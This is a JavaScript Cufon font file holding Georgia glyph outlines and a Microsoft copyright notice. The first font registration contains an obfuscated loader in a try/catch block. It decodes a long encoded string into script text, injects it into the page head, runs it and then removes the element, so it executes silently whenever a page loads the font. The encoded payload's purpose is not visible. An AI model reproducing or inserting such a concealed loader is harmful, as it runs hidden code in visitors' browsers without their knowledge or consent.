48,-71,-43r0,86v-2,19,19,21,35,23r0,12r-108,0r0,-12v16,-2,36,-2,36,-21r0,-180","w":215},{"d":"98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81xm94,-255v7,-25,50,-12,33,9v-16,20,-42,34,-62,51r-7,-6","w":194},{"d":"191,-16r-36,0r0,80r-34,0r0,-80r-112,0r0,-27r123,-150r23,0r0,154r36,0r0,23xm121,-39r0,-115r-95,115r95,0","w":203},{"d":"98,-178v50,-1,86,38,84,90v-2,55,-31,93,-87,93v-53,0,-82,-37,-83,-91v-1,-52,35,-92,86,-92xm98,-8v63,0,67,-157,0,-157v-38,0,-48,36,-49,76v0,43,10,81,49,81","w":194},{"d":"153,-268r-122,343r-22,0r121,-343r23,0","w":168},{"d":"146,-133v38,5,73,22,73,65v0,87,-115,66,-202,68r0,-12v15,-2,34,-4,34,-22r0,-179v1,-19,-18,-22,-33,-24r0,-12v76,5,185,-23,188,54v1,40,-32,50,-60,62xm88,-139v46,3,75,-8,75,-53v0,-41,-34,-48,-75,-43r0,96xm122,-14v36,-2,54,-22,54,-60v1,-43,-40,-57,-88,-50v5,43,-20,113,34,110","w":235},{"d":"144,-203r-9,5r-49,-48r-48,48r-9,-5v16,-22,30,-47,48,-67v7,-4,23,-2,25,5xm148,-77v0,27,-12,70,29,63r0,11v-24,13,-57,7,-62,-19v-20,35,-101,38,-101,-17v0,-55,68,-51,101,-72v1,-30,-3,-54,-33,-54v-9,0,-21,4,-25,8v5,16,6,39,-17,39v-12,0,-17,-10,-18,-20v5,-26,32,-38,62,-40v61,-5,64,39,64,101xm49,-43v-1,39,53,31,65,8r1,-61v-30,11,-64,15,-66,53","w":181},{"d":"140,-317v12,-23,52,-2,32,15v-17,15,-49,24,-72,37r-6,-7xm134,-255v77,0,120,52,120,131v0,77,-44,130,-120,130v-76,0,-120,-52,-120,-130v0,-78,44,-131,120,-131xm134,-10v59,0,77,-52,77,-114v0,-63,-18,-116,-77,-116v-60,0,-77,54,-77,116v0,62,17,114,77,114","w":267},{"d":"14,-123v-5,-103,104,-162,189,-114v4,-7,8,-15,22,-12r1,87r-14,0v-9,-40,-26,-78,-74,-78v-61,0,-82,53,-82,116v0,63,25,112,87,114v37,1,56,-17,48,-63v3,-24,-23,-25,-42,-27r0,-12r110,0r0,12v-41,-5,-34,44,-32,84v-28,12,-56,22,-92,22v-75,0,-117,-51,-121,-129","w":261},{"d":"16,-249v81,2,192,-19,192,61v0,62,-51,83,-120,78r0,76v-2,20,19,20,36,22r0,12r-107,0r0,-12v16,-2,34,-3,34,-22r0,-180v1,-19,-18,-22,-35,-23r0,-12xm88,-125v47,3,77,-12,77,-54v1,-44,-28,-61,-77,-56r0,110","w":219},{"d":"142,-149v-2,-8,-15,-12,-24,-13r0,-11r66,0r0,10v-33,10,-37,40,-49,70r-38,95r-13,0r-60,-145v-4,-10,-16,-17,-27,-19r0,-11r80,0r0,12v-10,0,-27,4,-19,15r42,102v12,-32,32,-65,42,-105","w":178},{"d":"47,-83v46,-34,128,-10,128,60v0,50,-40,87,-91,87v-36,0,-71,-19,-74,-48v-2,-28,39,-29,40,-5v0,6,-3,21,-5,26v40,31,101,0,92,-60v6,-57,-72,-75,-98,-34r-12,-5r15,-127r126,0r0,32r-112,0","w":190},{"d":"160,-326v11,0,21,10,21,22v0,12,-10,22,-21,22v-25,0,-26,-44,0,-44xm81,-326v11,0,21,10,21,22v0,12,-10,22,-21,22v-25,0,-26,-44,0,-44xm131,-14v54,9,72,-26,83,-59r13,0r-5,73r-207,0r0,-12v17,-1,36,-3,36,-22r0,-179v2,-20,-20,-22,-36,-24r0,-12r193,0r0,60r-13,0v-7,-26,-28,-53,-68,-47r-39,0r0,100v42,4,69,-4,69,-41r13,0r0,97r-13,0v-1,-36,-26,-47,-69,-42v4,48,-19,120,43,108","w":235}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+392-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("3+#zQj2C}xM53pX_vj16>+>M7B2z#jM57BL6}x&)#W$]R;CG7J(~I+I;WWdzIe`bRWdzIe`PRzdzIe`XIB`^vs[~#xLv7J(~I+>B7J(~I+#j7J(~I+&j7J(~I+RB7J(~I+WX7J(~I+Iz7J(~I+>z7J(~I+u87J(~I+th7J(~I+1G7J(~I+(C7J(~I+>~7J(~I+t;7J(~I+(d7J(~I+WP7J(~I+RC7J(~I+IV7J(~I+#b>1dzIe`j07b^vs[~Rsv^vs[~RxW^vs[~#j2^vs[~#e1^vs[~Rs&^vs[~#s[cg1dzIe`GRxL;7J(~I+Wj#z#^vs[~RB&^vs[~#sb^vs[~#jL^vs[~#srd7J(~I+uB7J(~I+IC7J(~I+t87J(~I+2j7J(~I+R~7J(~I+u~7J(~I+uC7J(~I+Id7J(~I+&X7J(~I+I6IXdzIe`bRC`17J(~I+tB7J(~I+>;7J(~I+>C^WdzIe`P#WdzIe`GIG?^vs[~#P1^vs[~R;#^vs[~#PLs3(X^vs[~#PvZxX&^vs[~RP1^vs[~#jW^vs[~Rj2>7J(~I+LX7J(~I+&r7J(~I+tz7J(~I+I87J(~I+u67J(~I+Ljsj|b7J(~I+(B7J(~I+LG0B2M#XdzIe`G2VX72zdzIe`bIWb#7J(~I+RzsxW^vs[;2BW&7J(6I+1PmG8bQ(M^vs[~#eWtxC|^vs[~Rs>82PX^71dzIe`j01dzIe`r26uj>6^-7J(~I+I~7J(~I+1jZ(d^vs[~#sv^vs[~RPb^vs[~Rj&NI6b^vs[~#+1^vs[~RB1|IJ`eLxb^vs[~RPX^vs[~#x&*7J(~I+(z7J(~I+uh7J(~I+#r7VW^vs[~Rs`^vs[~#x1`7pL5QezVm1h67J(~I+&GkXdzIe`b#J&r7J(~I+IhmzdzIe`rR6d_gr#^vs[~#PICQz~.uXdzIe`XIXdzIe`rICvuvPW^vs[~RB>GZ)2~Q+XC3p>G3Nd|ms[]^ezGZ)[]Qez~ZjdXQjvC}pd)mx>5#Gh)QJX~}JIMkVC_}xRnRGh.};C.7GiA0)vVvz~53s$nm;|GQBX$RjM|^)#$RjM|7ph~vJdXvj&PQ72$RjM|7phXkxWB}xWV#+W;}xv57phPQBC|LpM|Z)&X^VunQ+M[`pet1+J>L3ZI20mu&Ns(Wx7R#}Q^vkgibGPrXj)n|-*]?5.~d6;CzBV8hc_$MoAPR7&|QB85}+M;v+hbQx(|3x#.^Gi_}sd]06]*}NX)xB2Q}Wzvm7`Q}WzM3Ni|")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":231,"face":{"font-family":"Georgia","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"2 4 5 2 5 4 5 2 3 3","ascent":"288","descent":"-72","x-height":"5","bbox":"-26.4684 -328.991 365 78.25","underline-thickness":"17.7539","underline-position":"-23.0273","unicode-range":"U+0020-U+20AC"}}));
/*
 * The following copyright notice may not be removed under any circumstances.
 * 
 * Copyright:
 * Typeface and data copyright 1996 Microsoft Corporation. All Rights Reserved.
 * 
 * Trademark:
 * Georgia is a trademark of Microsoft Corporation.
 */
Cufon.registerFont((function(f){var b=_cufon_bridge_={p:[{"d":"161,-239v19,2,22,-12,28,-25r13,4v-9,24,-22,52,-53,53v-28,1,-42,-16,-65,-20v-15,1,-18,12,-26,26r-13,-5v9,-23,23,-50,52,-52v29,-2,41,17,64,19xm217,-34v0,16,11,19,25,21r0,13r-106,0v-7,-22,27,-7,23,-32v-6,-42,17,-118,-26,-118v-19,0,-31,10,-39,22r0,94v-1,15,10,19,23,21r0,13r-107,0r0,-13v16,0,29,-4,27,-19v-5,-46,21,-124,-29,-127r0,-13v28,0,62,-7,86,-2v1,8,-2,20,1,26v17,-14,32,-31,64,-31v70,0,59,78,58,145","w":248},{"d":"12,-249v90,7,234,-29,234,62v0,68,-63,82,-135,80r0,70v-1,20,20,20,36,23r0,14r-135,0r0,-14v18,-1,37,-2,37,-22r0,-176v1,-19,-21,-21,-37,-24r0,-13xm111,-124v42,2,66,-14,66,-54v0,-44,-20,-58,-66,-55r0,109","w":252},{"d":"202,-266r-6,5r-61,-36r-61,36r-6,-5v18,-20,32,-43,52,-60v28,-9,42,10,53,25v6,9,7,9,29,35xm49,-212v2,-20,-22,-20,-37,-24r0,-13r221,0r0,63r-13,0v-11,-38,-49,-56,-109,-48r0,97v42,4,68,-9,71,-43r14,0r0,104r-14,0v-3,-35,-26,-52,-71,-45v4,46,-19,116,41,105v56,9,72,-31,86,-62r13,0r-5,78r-234,0r0,-14v18,-1,38,-4,37,-22r0,-176","w":259},{"d":"208,-185v14,-26,16,-54,-27,-50r0,-14r101,0r0,14v-56,8,-62,73,-80,118r-49,120r-36,0r-86,-209v-8,-18,-20,-26,-42,-30r0,-13r135,0r0,13v-21,4,-38,2,-30,21r64,158","w":274},{"d":"122,-110v-4,38,-19,43,-41,63r147,0r0,47r-206,0r0,-33v33,-9,43,-33,40,-77r-34,0r0,-20r34,0v-15,-73,20,-127,90,-127v34,0,74,20,74,50v0,16,-11,29,-29,29v-36,0,-36,-38,-23,-60v-60,-18,-56,52,-52,108r69,0r0,20r-69,0","w":248},{"d":"224,0r-195,0r0,-29r83,0r0,-69r-83,0r0,-29r83,0r0,-83r29,0r0,83r83,0r0,29r-83,0r0,69r83,0r0,29"},{"d":"95,-34v-1,16,13,19,26,21r0,13r-111,0r0,-13v15,0,27,-3,27,-19r0,-102v-1,-17,-14,-23,-31,-25r0,-13v29,0,64,-7,89,-2r0,140xm61,-272v18,0,35,14,35,32v0,18,-17,32,-35,32v-18,0,-35,-14,-35,-32v0,-18,17,-32,35,-32","w":127},{"d":"134,-74v38,4,73,20,73,62v0,49,-56,77,-113,77v-40,0,-84,-19,-85,-53v0,-16,11,-29,29,-29v36,0,36,39,24,62v41,13,77,-9,77,-57v0,-42,-23,-52,-66,-49r0,-21v41,4,58,-14,58,-54v0,-36,-27,-51,-59,-39v10,25,12,62,-24,62v-18,0,-29,-13,-29,-29v1,-36,47,-54,89,-53v49,0,88,16,88,58v0,40,-33,51,-62,63","w":224},{"d":"211,-38v0,16,12,23,29,21r0,13v-28,0,-62,7,-87,3v-1,-7,2,-18,-1,-23v-17,15,-31,29,-66,29v-66,0,-53,-76,-54,-140v-1,-16,-12,-24,-29,-24r0,-13v28,1,62,-7,87,-2r0,117v-6,45,51,40,63,15r0,-95v-1,-16,-12,-23,-30,-22r0,-13v28,0,63,-7,88,-2r0,136xm82,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":243},{"d":"213,-34v0,16,12,19,26,21r0,13r-106,0v-6,-22,25,-7,22,-32v-6,-43,16,-118,-26,-118v-19,0,-31,10,-38,22r0,94v-2,16,10,19,22,21r0,13r-106,0v-6,-23,26,-7,26,-32r0,-196v0,-18,-14,-26,-32,-27r0,-13r87,-4r3,3r0,121v17,-16,32,-30,65,-31v70,-3,57,78,57,145","w":244},{"d":"349,-206v9,-25,-16,-28,-37,-29r0,-14r100,0r0,14v-54,8,-54,72,-69,115r-42,123r-35,0r-66,-186r-60,186r-35,0r-71,-209v-6,-19,-20,-26,-41,-30r0,-13r133,0r0,13v-16,3,-36,-1,-29,21r48,147r57,-181r37,0r66,187","w":405},{"d":"141,-315v13,-25,71,-8,47,16v-20,20,-57,23,-88,38r-6,-7xm148,-256v82,0,135,48,135,130v0,83,-51,133,-137,133v-80,0,-134,-48,-134,-129v0,-82,52,-134,136,-134xm148,-10v55,0,64,-56,64,-115v0,-56,-10,-114,-64,-114v-51,0,-66,53,-65,115v1,58,10,114,65,114","w":295},{"d":"131,-272v25,-1,45,9,45,30v-1,17,-8,28,-27,27v-26,-2,-28,-18,-39,-42v-19,10,-15,44,-16,83r49,0r0,19r-49,0r0,121v0,18,19,19,35,21r0,13r-118,0v-6,-23,26,-7,26,-32r0,-123r-36,0r0,-19r36,0v1,-60,32,-97,94,-98","w":141},{"d":"247,-217v21,20,36,52,36,91v0,83,-51,132,-137,133v-34,0,-63,-11,-84,-27r-35,37r-13,-12r35,-37v-21,-21,-37,-51,-37,-90v0,-82,52,-132,136,-134v35,0,65,11,86,27r34,-36r13,12xm148,-240v-68,1,-74,99,-62,169r117,-126v-9,-23,-25,-43,-55,-43xm148,-10v70,0,71,-99,61,-168r-117,126v9,24,26,42,56,42","w":295},{"d":"213,-1r-176,-88r0,-24r176,-88r0,33r-139,67r139,67r0,33"},{"d":"114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80xm158,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm70,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":228},{"d":"159,-163v36,8,64,31,65,75v1,63,-52,103,-119,87r0,-15v42,7,56,-31,56,-73v-1,-37,-11,-68,-49,-66v1,-7,-4,-19,7,-16v43,3,51,-87,7,-87v-32,0,-34,29,-35,65r0,193r-84,0r0,-13v15,-1,26,-3,26,-19r0,-147v-2,-66,36,-93,96,-93v42,0,79,14,80,55v1,34,-27,44,-50,54","w":236},{"d":"320,-37v-2,20,19,20,35,23r0,14r-135,0r0,-14v18,-1,38,-2,38,-23r0,-186r-85,219r-23,0r-81,-222r0,152v-4,41,14,56,44,60r0,14r-107,0r0,-14v18,-2,38,-5,40,-25v5,-45,2,-106,3,-157v1,-28,-16,-39,-41,-40r0,-13r115,0r61,164r60,-164r111,0r0,13v-16,2,-35,3,-35,23r0,176","w":368},{"d":"217,-134r-35,0r-55,-90r-56,90r-34,0r77,-122r25,0"},{"d":"180,-199r-10,5r-56,-45r-56,45r-9,-5v24,-25,28,-80,80,-71v25,22,29,39,51,71xm114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80","w":228},{"d":"149,54r-116,0r0,-321r116,0r0,17r-61,0r0,287r61,0r0,17","w":160},{"d":"68,-254v17,0,34,15,34,32v0,16,-17,33,-34,33v-17,0,-34,-16,-34,-33v0,-18,17,-33,34,-32xm75,-168v5,51,22,94,27,140v1,18,-16,34,-34,33v-57,-5,-24,-78,-17,-117v3,-14,6,-33,10,-56r14,0","w":135},{"d":"108,-212v2,-20,-22,-20,-36,-24r0,-13r133,0r0,13v-17,3,-34,2,-34,23r0,137v-3,54,-41,80,-95,83v-41,1,-73,-22,-73,-60v0,-22,13,-37,35,-37v19,0,33,13,33,31v1,21,-19,27,-26,41v29,23,63,-9,63,-53r0,-141","w":214},{"d":"76,-239v7,17,4,37,-22,37v-13,0,-27,-6,-24,-20v10,-47,132,-52,131,13r-1,66v-1,15,9,18,25,17r0,12v-21,11,-66,11,-72,-13v-17,27,-90,30,-90,-15v0,-46,59,-43,90,-59v1,-22,1,-43,-21,-42v-7,0,-13,1,-16,4xm73,-150v-2,26,32,24,40,9r0,-46v-19,7,-38,12,-40,37","w":198},{"d":"211,-38v0,16,12,23,29,21r0,13v-28,0,-62,7,-87,3v-1,-7,2,-18,-1,-23v-17,15,-31,29,-66,29v-66,0,-53,-76,-54,-140v-1,-16,-12,-24,-29,-24r0,-13v28,1,62,-7,87,-2r0,117v-6,45,51,40,63,15r0,-95v-1,-16,-12,-23,-30,-22r0,-13v28,0,63,-7,88,-2r0,136xm118,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":243},{"d":"184,-199r-9,5r-57,-45r-55,45r-9,-5v17,-23,29,-51,50,-70v53,-11,52,37,80,70xm211,-38v0,16,12,23,29,21r0,13v-28,0,-62,7,-87,3v-1,-7,2,-18,-1,-23v-17,15,-31,29,-66,29v-66,0,-53,-76,-54,-140v-1,-16,-12,-24,-29,-24r0,-13v28,1,62,-7,87,-2r0,117v-6,45,51,40,63,15r0,-95v-1,-16,-12,-23,-30,-22r0,-13v28,0,63,-7,88,-2r0,136","w":243},{"d":"371,-40r-27,0r0,44r-41,0r0,-44r-84,0r0,-24r89,-106r36,0r0,104r27,0r0,26xm303,-66r0,-74r-62,74r62,0xm295,-251r-144,251r-27,0r143,-251r28,0xm116,-174v27,3,51,13,51,43v1,63,-138,71,-147,13v-2,-14,9,-23,22,-24v26,-2,28,28,19,46v28,9,56,-2,56,-36v0,-28,-17,-34,-46,-32r0,-16v28,2,41,-9,41,-36v1,-21,-21,-31,-43,-24v9,16,10,45,-17,45v-14,0,-23,-10,-22,-23v4,-50,127,-54,129,2v1,28,-24,32,-43,42","w":385},{"d":"168,-207v-3,61,-68,59,-104,85r112,0r0,36r-145,0r0,-25v26,-29,84,-43,87,-97v1,-25,-19,-41,-45,-32v10,17,8,46,-18,46v-13,0,-22,-11,-22,-23v0,-55,138,-53,135,10","w":198},{"d":"84,17v42,-8,61,42,24,55v-16,6,-33,6,-58,6r0,-14v19,-1,44,4,44,-14v0,-12,-12,-10,-25,-11r0,-42r15,0r0,20","w":180},{"d":"214,-223v-2,-12,-15,-11,-31,-13r0,-13r92,0r0,13v-56,14,-66,75,-97,112v-18,22,-14,48,-15,86v-1,20,21,22,39,24r0,14r-139,0r0,-14v18,-1,39,-2,38,-22v-2,-32,2,-64,-13,-84v-26,-35,-41,-82,-75,-110v-5,-3,-17,-5,-24,-6r0,-13r143,0r0,13v-20,2,-41,0,-31,17r55,96v40,-65,38,-59,58,-100","w":263},{"d":"96,-196v21,-1,63,-23,63,6v0,31,-42,4,-63,5v12,16,57,48,19,60v-21,-5,-18,-35,-28,-54v-11,16,-7,51,-28,54v-39,-13,8,-43,19,-60v0,0,-59,25,-64,-5v4,-29,41,-6,64,-6v-10,-16,-35,-27,-35,-45v0,-8,8,-15,16,-15v23,0,16,38,28,54v10,-19,7,-50,28,-54v38,13,-9,45,-19,60","w":173},{"d":"123,-30v-2,43,3,76,45,73r0,16v-57,-1,-105,-8,-104,-67r2,-43v2,-35,-23,-39,-53,-42r0,-26v29,-3,57,-7,53,-41v-6,-58,3,-108,60,-108v13,-1,27,-2,42,-2r0,15v-41,-2,-48,30,-45,74v3,46,-27,62,-64,69r0,13v37,8,67,22,64,69","w":180},{"d":"146,-140v15,-14,1,-20,-15,-22r0,-12r89,0r0,12v-35,9,-53,22,-76,43r62,92v7,10,17,13,30,14r0,13r-83,0v-18,-33,-33,-53,-52,-80v-16,10,-20,73,14,67r0,13r-108,0v-6,-23,31,-7,26,-32r0,-196v-1,-18,-14,-26,-32,-27r0,-13r87,-4r3,3r0,181","w":227},{"d":"170,-199r-10,5r-56,-45r-55,45r-9,-5v24,-25,28,-81,79,-71v25,22,29,39,51,71xm134,-20v24,0,41,-17,52,-32r13,10v-17,27,-44,48,-86,48v-63,0,-101,-33,-101,-94v0,-56,37,-91,97,-91v57,0,88,27,85,86r-118,0v0,45,14,74,58,73xm132,-109v-1,-26,-1,-56,-26,-56v-25,0,-30,25,-30,57","w":205},{"d":"86,-155v50,-50,144,-13,134,69v7,80,-101,118,-158,72v-12,7,-20,29,-36,19v5,-72,1,-156,2,-233v-1,-18,-14,-26,-32,-27r0,-13r87,-4r3,3r0,114xm118,-9v52,0,58,-142,-2,-143v-15,0,-23,4,-30,13v5,49,-19,130,32,130","w":232},{"d":"211,-38v0,16,12,23,29,21r0,13v-28,0,-62,7,-87,3v-1,-7,2,-18,-1,-23v-17,15,-31,29,-66,29v-66,0,-53,-76,-54,-140v-1,-16,-12,-24,-29,-24r0,-13v28,1,62,-7,87,-2r0,117v-6,45,51,40,63,15r0,-95v-1,-16,-12,-23,-30,-22r0,-13v28,0,63,-7,88,-2r0,136","w":243},{"d":"134,-20v24,0,41,-17,52,-32r13,10v-17,27,-44,48,-86,48v-63,0,-101,-33,-101,-94v0,-56,37,-91,97,-91v57,0,88,27,85,86r-118,0v0,45,14,74,58,73xm132,-109v-1,-26,-1,-56,-26,-56v-25,0,-30,25,-30,57xm68,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":205},{"d":"192,-303v20,2,24,-11,29,-25r13,4v-9,24,-22,51,-53,53v-29,1,-42,-16,-66,-20v-15,2,-17,12,-25,26r-13,-5v9,-23,22,-50,52,-52v28,-2,40,17,63,19xm235,-81v-5,-63,20,-155,-43,-155r0,-13r107,0r0,13v-33,0,-43,19,-43,59r0,178r-31,0r-156,-192v7,68,-25,176,44,177r0,14r-107,0r0,-14v35,-1,46,-17,43,-58v-5,-64,22,-160,-44,-163r0,-14r94,0","w":302},{"d":"271,-251r-144,251r-28,0r144,-251r28,0xm104,-116v0,15,18,16,32,17r0,13r-110,0r0,-13v13,-2,33,1,33,-16r0,-102r-34,0v1,-7,-3,-18,7,-15v25,1,41,-9,50,-23r24,0v-3,44,-2,92,-2,139xm364,-121v-3,61,-68,59,-104,85r112,0r0,36r-145,0r0,-25v26,-29,84,-43,87,-97v1,-25,-19,-41,-45,-32v10,17,8,46,-18,46v-13,0,-22,-11,-22,-23v0,-55,138,-53,135,10","w":385},{"d":"104,-274v27,0,49,14,49,41v-1,24,-22,42,-49,41v-28,0,-49,-14,-49,-41v0,-26,22,-41,49,-41xm104,-205v17,0,23,-11,23,-28v0,-16,-7,-29,-23,-29v-15,0,-23,12,-23,29v0,16,7,28,23,28xm211,-17r0,13v-26,13,-81,14,-87,-16v-21,34,-110,37,-110,-18v0,-59,72,-53,110,-73v-1,-26,2,-56,-26,-54v-9,0,-15,2,-21,6v9,21,7,47,-25,47v-19,0,-29,-10,-30,-26v6,-31,43,-40,79,-41v47,0,81,10,81,58v0,40,-24,112,29,104xm75,-48v0,32,37,32,48,12r1,-59v-25,8,-49,15,-49,47","w":214},{"d":"151,-239v19,2,23,-11,28,-25r14,4v-9,24,-22,52,-53,53v-29,1,-42,-16,-66,-20v-15,2,-17,12,-25,26r-13,-5v9,-23,23,-50,52,-52v28,-2,40,17,63,19xm114,-179v63,0,102,30,102,91v0,62,-40,94,-103,94v-60,0,-101,-33,-101,-93v0,-60,40,-91,102,-92xm115,-9v35,0,37,-41,37,-79v0,-34,-1,-78,-37,-77v-35,1,-38,38,-38,76v0,41,1,80,38,80","w":228},{"d":"88,-254v8,-26,67,-23,50,10v-19,19,-56,34,-81,50r-8,-6","w":180},{"d":"61,-131v17,0,35,18,35,35v0,17,-17,34,-35,34v-18,0,-35,-16,-35,-34v0,-18,18,-35,35,-35","w":121},{"d":"200,-135v-2,71,-101,50,-137,87r147,0r0,48r-191,0r0,-32v30,-35,90,-45,112,-86v11,-40,-15,-74,-56,-57v12,23,10,62,-25,62v-18,0,-29,-13,-29,-29v0,-70,182,-76,179,7","w":225},{"d":"127,-116v0,15,18,16,32,17r0,13r-110,0r0,-13v13,-2,33,1,33,-16r0,-102r-34,0v1,-7,-3,-18,7,-15v25,1,41,-9,50,-23r24,0v-3,44,-2,92,-2,139","w":198},{"d":"121,-174v27,3,51,13,51,43v1,63,-138,71,-147,13v-2,-14,9,-23,22,-24v26,-2,28,28,19,46v28,9,56,-2,56,-36v0,-28,-17,-34,-46,-32r0,-16v28,2,41,-9,41,-36v1,-21,-21,-31,-43,-24v9,16,10,45,-17,45v-14,0,-23,-10,-22,-23v4,-50,127,-54,129,2v1,28,-24,32,-43,42","w":198},{"d":"145,-315v12,-24,68,-11,48,16v-22,18,-58,23,-89,38r-5,-7xm214,-223v-2,-12,-15,-11,-31,-13r0,-13r92,0r0,13v-56,14,-66,75,-97,112v-18,22,-14,48,-15,86v-1,20,21,22,39,24r0,14r-139,0r0,-14v18,-1,39,-2,38,-22v-2,-32,2,-64,-13,-84v-26,-35,-41,-82,-75,-110v-5,-3,-17,-5,-24,-6r0,-13r143,0r0,13v-20,2,-41,0,-31,17r55,96v40,-65,38,-59,58,-100","w":263},{"d":"224,-87r-83,0r0,83r-29,0r0,-83r-83,0r0,-28r83,0r0,-83r29,0r0,83r83,0r0,28"},{"d":"15,-179v0,-39,30,-70,74,-70r100,0r0,14r-20,0r0,273r-21,0r0,-273r-29,0r0,273r-22,0r0,-148v-44,0,-83,-24,-82,-69","w":197},{"d":"134,-20v24,0,41,-17,52,-32r13,10v-17,27,-44,48,-86,48v-63,0,-101,-33,-101,-94v0,-56,37,-91,97,-91v57,0,88,27,85,86r-118,0v0,45,14,74,58,73xm132,-109v-1,-26,-1,-56,-26,-56v-25,0,-30,25,-30,57xm149,-267v15,0,28,15,28,30v0,14,-13,29,-28,29v-16,0,-29,-14,-29,-29v0,-15,14,-30,29,-30xm61,-267v15,0,29,15,29,30v0,15,-13,29,-29,29v-15,0,-28,-15,-28,-29v1,-15,12,-30,28,-30","w":205},{"d":"12,-87v-6,-82,104,-115,166,-75r32,-32r11,11r-31,31v14,14,26,36,26,64v0,87,-104,117,-166,75r-32,34r-12,-11r33,-32v-14,-15,-25,-38,-27,-65xm115,-166v-45,0,-41,62,-39,108r73,-76v-5,-19,-14,-32,-34,-32xm115,-8v44,0,39,-62,38,-109r-74,76v7,18,13,33,36,33","w":228},{"d":"140,-21v29,0,42,-14,53,-34r14,9v-13,24,-36,45,-67,49r0,50r-17,0r0,-49v-61,0,-102,-32,-100,-92v2,-57,42,-87,100,-91r0,-45r17,0r0,45v29,3,53,12,56,38v2,17,-11,27,-29,26v-15,0,-24,-8,-27,-22r0,116xm123,-165v-52,10,-48,130,0,141r0,-141","w":217},{"d":"170,-261v84,0,155,72,155,155v0,83,-71,155,-155,155v-84,0,-156,-71,-156,-155v0,-84,72,-155,156,-155xm170,34v75,0,138,-64,138,-140v0,-76,-63,-140,-138,-140v-76,0,-139,65,-139,140v0,76,63,140,139,140xm204,-106v24,21,33,65,73,70r0,11r-64,0r-53,-74r-6,0v2,26,-10,67,21,63r0,11r-85,0r0,-11v11,-1,23,-3,23,-15r0,-111v2,-13,-14,-14,-23,-17r0,-10v58,4,153,-18,153,39v0,26,-18,37,-39,44xm154,-111v29,2,45,-8,44,-36v0,-25,-18,-30,-44,-30r0,66","w":339},{"d":"178,-133v12,16,13,48,0,64r41,42r-19,19r-41,-41v-18,12,-47,12,-65,0r-41,41r-19,-20r41,-41v-13,-16,-12,-47,0,-64r-41,-41r19,-19r41,41v16,-12,47,-13,64,-1r41,-40r20,19xm126,-64v19,0,36,-17,36,-36v1,-20,-16,-37,-36,-37v-19,0,-36,18,-36,37v0,19,17,36,36,36"},{"d":"95,-34v-1,16,13,19,26,21r0,13r-111,0r0,-13v15,0,27,-3,27,-19r0,-102v-1,-17,-14,-23,-31,-25r0,-13v29,0,64,-7,89,-2r0,140xm120,-199r-9,5r-53,-45r-52,45r-9,-5v16,-23,26,-52,46,-71v53,-9,51,38,77,71","w":127},{"d":"181,-70r-74,53r-9,-8r54,-70r-54,-72r9,-8v31,29,114,54,74,105xm104,-70r-74,53r-9,-8r54,-70r-54,-72r9,-8v31,30,113,53,74,105","w":219},{"d":"12,-269v148,2,171,261,47,312v-15,7,-31,13,-47,15r0,-16v53,-13,69,-72,69,-148v0,-76,-15,-134,-69,-147r0,-16","w":160},{"d":"144,-249v83,2,144,40,144,126v0,85,-64,123,-150,123r-126,0r0,-14v18,0,38,-2,37,-21r0,-86r-35,0r0,-18r35,0r0,-73v0,-18,-21,-22,-37,-24r0,-13r132,0xm144,-16v59,-3,73,-47,73,-107v-1,-71,-27,-118,-106,-110r0,94r54,0r0,18r-54,0v4,42,-17,107,33,105","w":300},{"w":91},{"d":"173,-102v21,0,28,-17,36,-35r19,8v-13,26,-28,58,-65,59v-36,1,-50,-30,-82,-30v-22,0,-29,16,-37,35r-19,-8v12,-26,28,-58,65,-59v37,-1,49,30,83,30"},{"d":"116,-290v-26,-8,-21,-41,8,-38v24,2,29,19,44,32r29,28r-6,7v-28,-13,-52,-21,-75,-29xm236,-91v-2,-61,17,-146,-45,-145r0,-13r108,0r0,13v-63,-2,-43,91,-43,152v0,56,-44,91,-101,91v-67,0,-111,-29,-111,-91r0,-128v0,-18,-18,-22,-34,-24r0,-13r131,0r0,13v-18,1,-35,4,-35,22v0,82,-26,200,64,197v42,-2,68,-28,66,-74","w":300},{"d":"95,-34v-1,16,13,19,26,21r0,13r-111,0r0,-13v15,0,27,-3,27,-19r0,-102v-1,-17,-14,-23,-31,-25r0,-13v29,0,64,-7,89,-2r0,140xm25,-234v-20,-11,-18,-40,7,-38v31,1,30,20,47,41r23,31r-7,6v-30,-20,-45,-26,-70,-40","w":127},{"d":"85,-127r-30,0r0,-141r30,0r0,141xm85,75r-30,0r0,-143r30,0r0,143","w":139},{"d":"111,-201v71,-2,138,2,135,69v-3,64,-64,78,-135,75v-5,30,9,43,35,43r0,14r-134,0r0,-14v18,-1,37,-2,37,-22r0,-176v1,-19,-21,-21,-37,-24r0,-13r134,0r0,13v-21,2,-40,8,-35,35xm111,-74v43,2,66,-15,66,-55v0,-44,-20,-59,-66,-